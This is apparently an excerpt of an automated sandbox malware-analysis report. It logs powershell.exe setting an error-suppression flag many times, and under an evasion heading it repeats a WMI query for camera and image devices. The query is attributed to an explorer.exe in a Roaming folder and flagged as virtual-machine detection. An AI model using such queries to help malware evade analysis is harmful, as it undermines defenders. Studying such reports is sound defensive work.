                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
